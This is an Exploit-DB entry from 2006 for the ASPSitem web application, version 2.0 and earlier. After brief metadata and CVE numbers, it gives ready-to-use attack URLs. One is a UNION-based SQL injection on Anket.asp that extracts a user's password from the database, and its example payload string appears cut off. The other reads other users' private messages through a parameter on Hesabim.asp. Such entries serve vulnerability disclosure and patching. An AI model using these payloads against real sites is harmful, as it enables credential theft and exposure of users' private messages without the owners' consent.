ASPSitem <= 2.0 - Remote SQL Injection / DB Disclosure Vulnerabilities

ID EDB-ID:1845
Type exploitdb
Reporter nukedx
Modified 2006-05-28T00:00:00


ASPSitem <= 2.0 Remote (SQL Injection / DB Disclosure) Vulnerabilities. CVE-2006-2793,CVE-2006-2794. Webapps exploit for asp platform

                                            ASPSitem &lt;= 2.0 Multiple Vulnerabilities.
Contacts &gt; ICQ: 10072 MSN/Mail: web:
This exploits works on ASPSitem &lt;= 2.0.
Original advisory can be found at:
SQL injection -&gt;
GET -&gt; http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL]
EXAMPLE -&gt; http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20
with this example remote attacker can leak userid 1's login information from database.
Read others private messages -&gt;
GET/EXAMPLE -&gt; http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername

# [2006-05-27]

# [2006-05-28]